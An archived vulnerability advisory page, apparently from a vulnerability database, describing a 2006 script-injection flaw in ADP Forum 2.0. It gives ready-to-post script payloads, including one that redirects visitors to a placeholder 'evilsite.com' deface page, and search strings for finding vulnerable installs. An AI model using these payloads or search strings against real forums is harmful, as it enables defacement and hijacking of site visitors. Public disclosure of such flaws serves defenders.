Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11751
HistoryMar 09, 2006 - 12:00 a.m.

ADP Forum 2.0,* script İnjection

2006-03-0900:00:00
vulners.com
149
JSON

http://biyosecurity.be/bugs/adpforum2.html

ADP Forum 2.0,* script İnjection

site:http://www.linux.it/~fedro/
demo:http://www.adp.host.sk/Forum203/

Post This Code:

<script>alert(/Liz0ziM/)</script>

<script>location.href="http://evilsite.com/deface.html&quot;;&lt;/script&gt;

vs…

Example Post Message :

Name :Liz0ziM
Username :username
Password :password
E-mail :[email protected]
Subject :<script>location.href="http://evilsite.com/deface.html&quot;;&lt;/script&gt;
Message :LOL :=)

Credit:Liz0ziM
Mail :[email protected]
Site :www.biyosecurity.com
BiyoSecurityTeam: Liz0ziM,Codexploder'tq,r00t3rr0r,y3LL0w

google:

"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"

Source:

http://www.blogcu.com/Liz0ziM/338614/

http://biyosecurity.be/bugs/adpforum2.html

http://biyosecurity.be/bugs/adpforum2.txt

Get your free email from http://mymail.bsdmail.com

JSON